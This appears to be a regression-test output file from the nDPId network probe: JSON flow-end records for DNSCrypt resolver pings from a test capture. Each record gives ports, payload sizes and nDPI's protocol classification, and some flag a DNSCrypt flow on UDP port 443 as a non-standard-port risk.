+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391308,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":59400,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381016,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":58948,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312133,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317429,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":56494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":36930,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304626,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337214,"flow_idle_time":180000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":44496,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52221,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304360,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305220,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318063,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47729,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318059,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":53876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318164,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":59011,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380834,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":52056,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305348,"flow_last_seen":946739305457,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305348,"flow_last_seen":946739305460,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38482,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305349,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312102,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337188,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":59589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306434,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317494,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52356,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318202,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":54215,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305331,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381017,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":57090,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317460,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":41717,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305349,"flow_last_seen":946739305461,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304806,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739299327,"flow_last_seen":946739299355,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":52040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305187,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396216,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":33143,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
